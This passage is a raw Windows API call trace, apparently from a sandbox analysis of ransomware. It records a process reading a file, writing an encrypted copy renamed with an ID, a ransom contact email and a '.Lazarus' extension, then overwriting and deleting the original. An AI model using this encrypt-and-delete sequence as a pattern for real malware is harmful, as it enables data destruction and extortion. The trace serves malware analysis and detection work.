(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0080.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0080.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0080.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0080.708] AreFileApisANSI () returned 1 [0080.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\SetupUi.xsd", lpUsedDefaultChar=0x0) returned 34 [0080.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0080.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.708] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0080.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0080.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0080.708] AreFileApisANSI () returned 1 [0080.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0080.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0080.708] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0080.708] GetFileType (hFile=0x428) returned 0x1 [0080.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0080.709] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0080.709] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0080.709] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0080.709] CloseHandle (hObject=0x428) returned 1 [0080.709] AreFileApisANSI () returned 1 [0080.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69300 [0080.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0080.709] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0080.710] GetFileType (hFile=0x428) returned 0x1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0080.710] CloseHandle (hObject=0x428) returned 1 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0080.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0080.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0080.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0080.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0080.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0080.711] AreFileApisANSI () returned 1 [0080.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0080.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0080.711] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8)) returned 1 [0080.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0080.711] AreFileApisANSI () returned 1 [0080.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0080.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0080.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0080.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0080.711] GetLastError () returned 0x0 [0080.711] SetLastError (dwErrCode=0x0) [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0080.711] GetLastError () returned 0x0 [0080.711] SetLastError (dwErrCode=0x0) [0080.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0080.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69170 [0080.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0080.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75eb8 [0080.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0080.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0080.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0080.712] AreFileApisANSI () returned 1 [0080.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75eb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0080.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0080.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75eb8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=96 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 96 [0080.712] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0080.759] GetFileType (hFile=0x428) returned 0x1 [0080.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0080.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0080.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0080.760] AreFileApisANSI () returned 1 [0080.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69210 [0080.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0080.760] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.760] GetFileType (hFile=0x42c) returned 0x1 [0080.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0080.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0080.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0080.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0080.760] GetLastError () returned 0x0 [0080.760] SetLastError (dwErrCode=0x0) [0080.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0080.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0080.760] GetLastError () returned 0x0 [0080.760] SetLastError (dwErrCode=0x0) [0080.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0080.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0080.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0080.761] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0080.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0080.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0080.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0080.763] GetLastError () returned 0x0 [0080.763] SetLastError (dwErrCode=0x0) [0080.763] GetLastError () returned 0x0 [0080.763] SetLastError (dwErrCode=0x0) [0080.763] GetLastError () returned 0x0 [0080.763] SetLastError (dwErrCode=0x0) [0080.764] GetLastError () returned 0x0 [0080.764] SetLastError (dwErrCode=0x0) [0080.764] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.764] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.765] GetLastError () returned 0x0 [0080.765] SetLastError (dwErrCode=0x0) [0080.765] GetLastError () returned 0x0 [0080.765] SetLastError (dwErrCode=0x0) [0080.765] GetLastError () returned 0x0 [0080.765] SetLastError (dwErrCode=0x0) [0080.765] GetLastError () returned 0x0 [0080.766] SetLastError (dwErrCode=0x0) [0080.766] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.766] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.766] GetLastError () returned 0x0 [0080.766] SetLastError (dwErrCode=0x0) [0080.766] GetLastError () returned 0x0 [0080.766] SetLastError (dwErrCode=0x0) [0080.766] GetLastError () returned 0x0 [0080.766] SetLastError (dwErrCode=0x0) [0080.766] GetLastError () returned 0x0 [0080.766] SetLastError (dwErrCode=0x0) [0080.767] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.767] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.767] GetLastError () returned 0x0 [0080.767] SetLastError (dwErrCode=0x0) [0080.767] GetLastError () returned 0x0 [0080.767] SetLastError (dwErrCode=0x0) [0080.767] GetLastError () returned 0x0 [0080.767] SetLastError (dwErrCode=0x0) [0080.767] GetLastError () returned 0x0 [0080.767] SetLastError (dwErrCode=0x0) [0080.767] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.768] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.768] GetLastError () returned 0x0 [0080.768] SetLastError (dwErrCode=0x0) [0080.768] GetLastError () returned 0x0 [0080.768] SetLastError (dwErrCode=0x0) [0080.768] GetLastError () returned 0x0 [0080.768] SetLastError (dwErrCode=0x0) [0080.768] GetLastError () returned 0x0 [0080.768] SetLastError (dwErrCode=0x0) [0080.768] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.768] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.769] GetLastError () returned 0x0 [0080.769] SetLastError (dwErrCode=0x0) [0080.769] GetLastError () returned 0x0 [0080.769] SetLastError (dwErrCode=0x0) [0080.769] GetLastError () returned 0x0 [0080.769] SetLastError (dwErrCode=0x0) [0080.769] GetLastError () returned 0x0 [0080.769] SetLastError (dwErrCode=0x0) [0080.769] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0080.769] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.769] GetLastError () returned 0x0 [0080.770] SetLastError (dwErrCode=0x0) [0080.770] GetLastError () returned 0x0 [0080.770] SetLastError (dwErrCode=0x0) [0080.770] GetLastError () returned 0x0 [0080.770] SetLastError (dwErrCode=0x0) [0080.770] GetLastError () returned 0x0 [0080.770] SetLastError (dwErrCode=0x0) [0080.770] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x5a8, lpOverlapped=0x0) returned 1 [0080.770] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0080.770] GetLastError () returned 0x0 [0080.770] SetLastError (dwErrCode=0x0) [0080.770] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0080.771] GetLastError () returned 0x0 [0080.771] SetLastError (dwErrCode=0x0) [0080.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0080.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0080.771] GetLastError () returned 0x0 [0080.771] SetLastError (dwErrCode=0x0) [0080.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0080.771] WriteFile (in: hFile=0x428, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0x5b0, lpOverlapped=0x0) returned 1 [0080.771] GetLastError () returned 0x0 [0080.771] SetLastError (dwErrCode=0x0) [0080.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0080.771] GetLastError () returned 0x0 [0080.771] SetLastError (dwErrCode=0x0) [0080.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0080.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0080.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0080.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0080.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0080.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0080.772] CloseHandle (hObject=0x428) returned 1 [0080.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0080.773] CloseHandle (hObject=0x42c) returned 1 [0080.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0080.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0080.774] AreFileApisANSI () returned 1 [0080.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0080.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0080.774] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.907] GetFileType (hFile=0x42c) returned 0x1 [0080.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0080.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0080.913] GetLastError () returned 0xb7 [0080.919] SetLastError (dwErrCode=0xb7) [0080.919] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0080.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0080.929] CloseHandle (hObject=0x42c) returned 1 [0080.929] AreFileApisANSI () returned 1 [0080.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0080.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x68f40 [0080.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=34 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 34 [0080.929] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 1 [0080.930] HeapFree 